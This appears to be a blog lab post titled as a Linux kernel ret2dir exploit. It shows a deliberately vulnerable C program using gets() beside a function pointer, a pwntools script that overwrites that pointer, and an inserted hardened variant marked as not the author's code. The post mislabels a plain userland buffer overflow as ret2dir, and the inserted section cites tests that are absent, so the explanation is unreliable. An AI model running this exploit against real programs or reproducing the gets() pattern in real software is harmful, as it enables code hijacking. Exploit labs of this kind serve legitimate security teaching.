10. Return-to-Direct-Mapped Memory (ret2dir) Attacks

Linux kernel exploit

woddlwoddl 2024. 5. 12. 22:55

Return-to-Direct-Mapped Memory (ret2dir) attacks involve redirecting program execution to a specific location in memory, typically to execute malicious code or escalate privileges.

Lab Activity: Return-to-Direct-Mapped Memory (ret2dir) Attack

In this lab activity, we'll demonstrate a ret2dir attack on a vulnerable C program.

Defender Side Code:


#include <stdio.h>
#include <stdlib.h>

void vulnerable_function(char *name) {
    printf("Hello, %s!\n", name);
}

int main(void) {
    char name[64];
    /* Prototyped pointer type so the call below matches vulnerable_function's signature.
       The pointer is placed right after the buffer on purpose: it is the lab's overwrite target. */
    void (*func_ptr)(char *) = vulnerable_function;

    printf("Enter your name: ");
    gets(name);  // Vulnerability (deliberate): gets() doesn't check buffer boundaries

    printf("Nice to meet you, ");
    func_ptr(name);  // Attacker controls the function pointer after an overflow of name[]
    printf("\n");

    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c
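For contrast with the lab program above, here is a hardened variant. It is an added example, not the post's own code: the greeting logic is kept, but gets() is replaced by a bounded line reader (read_name, a name chosen here) that can never write past the 64-byte buffer, so the adjacent function pointer cannot be clobbered through this input. The reader also distinguishes a line that fit exactly from one that had to be truncated, and drains the excess so it does not leak into a later read.

```c
/* Hardened variant of the lab program (added example, not the original post's code).
 * The change relevant to the attack described above is the input path: gets() is
 * replaced by a bounded read, so the buffer cannot overflow into func_ptr. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define NAME_LEN 64

/* Read one line into buf (capacity cap) from stream in.
 * Returns 0 on success, -1 on EOF/error before any data,
 * 1 if the line was longer than the buffer (stored text is truncated;
 * the remainder of the line is drained so a later read cannot consume it). */
int read_name(char *buf, size_t cap, FILE *in) {
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL) {
        if (cap) buf[0] = '\0';
        return -1;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';          /* normal case: whole line fit, strip newline */
        return 0;
    }
    /* No newline in the buffer: the line either fit exactly or was too long. */
    int c = getc(in);
    if (c == EOF || c == '\n')
        return 0;                   /* fit exactly (with or without trailing newline) */
    while (c != '\n' && c != EOF)   /* drain the oversized remainder */
        c = getc(in);
    return 1;
}

static void greet(const char *name) {
    printf("Hello, %s!\n", name);
}

int main(void) {
    char name[NAME_LEN];
    /* Prototyped pointer type: the compiler checks the call matches greet(). */
    void (*func_ptr)(const char *) = greet;

    printf("Enter your name: ");
    int rc = read_name(name, sizeof name, stdin);
    if (rc < 0) {
        fputs("no input\n", stderr);
        return 1;
    }
    if (rc > 0)
        fprintf(stderr, "warning: name truncated to %d characters\n", NAME_LEN - 1);

    printf("Nice to meet you, ");
    func_ptr(name);
    return 0;
}
```

Compiled the same way as the lab program, this version answers an oversized line with a truncation warning instead of a corrupted function pointer; fmemopen() is used only in the tests to feed constructed input.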

Exploit Code (Python using pwntools):

We need to find the address of the target function or shellcode to redirect the program execution.


from pwn import *

# Address of the target function or shellcode
# This address needs to be determined using tools like gdb or pwntools' ELF class
target_addr = 0x004005f7  # Example address, adjust as necessary

# Padding to fill the buffer and overwrite the function pointer
padding = b"A" * 64

# Payload to redirect program execution to the target address
payload = padding + p64(target_addr)

# Establishing connection to the vulnerable program
p = process("./vulnerable_program")

# Sending the payload
p.sendline(payload)

# Interactive shell
p.interactive()

The exploit code constructs a payload with padding to fill the buffer and overwrite the function pointer with the address of the target function or shellcode. Before running the exploit, we need to find the address of the target function using tools like gdb or pwntools' ELF class. Once the address is obtained, we set it in the exploit code. Then, we establish a connection to the vulnerable program, send the payload, and gain control over program execution upon successful exploitation.